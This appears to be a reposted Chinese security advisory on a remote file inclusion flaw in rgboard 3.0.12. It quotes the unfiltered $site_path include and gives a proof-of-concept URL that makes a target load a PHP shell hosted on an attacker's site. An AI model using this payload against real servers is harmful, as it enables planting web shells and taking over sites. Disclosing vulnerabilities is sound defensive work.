首页 > 网站 > 帮助中心 > 正文

rgboard 3.0.12 远程文件包含漏洞

2024-07-09 22:40:51
字体:
来源:转载
供稿:网友
vul code:
/include/bbs.lib.inc.php:
if (!defined('BBS_LIB_INC_INCLUDED')) {
define('BBS_LIB_INC_INCLUDED', 1);
// * BBS_LIB_INC_INCLUDED START *
if(!$site_path) $site_path='./';
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表